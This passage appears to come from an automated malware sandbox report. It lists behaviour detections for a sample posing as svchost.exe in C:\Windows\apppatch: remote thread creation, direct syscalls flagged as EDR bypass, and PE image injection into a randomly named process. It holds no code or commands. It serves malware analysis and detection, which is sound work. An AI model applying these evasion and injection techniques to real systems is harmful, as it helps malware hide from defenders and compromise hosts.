Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3031360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2861360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2D91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 801360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: C01360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B71360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 9D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2251360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2BA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: FB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2551360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: F41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: F41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 7E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1461360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2901360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 23E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: D21360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1561360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 31E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 31E1360	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtSetInformationFile: Direct from: 0x76F02D0C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQueryValueKey: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtSetInformationThread: Direct from: 0x76F02ECC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtMapViewOfSection: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtSetValueKey: Direct from: 0x76F0309C	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	NtQueryInformationProcess: Direct from: 0x76F02C26

Injects a PE file into a foreign processes

Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1282000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D82000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C22000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1022000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3012000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 852000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2962000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2652000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B02000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2882000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C72000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1322000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2492000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2922000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1332000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 952000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C12000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2822000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2732000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D72000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1052000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2912000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B72000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3032000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2862000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D92000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 802000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C02000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B72000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2252000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1462000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2902000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D22000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1562000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E2000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E2000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E41000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E94000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D51000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1280000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1281000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1282000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 12D4000	Jump to behavior
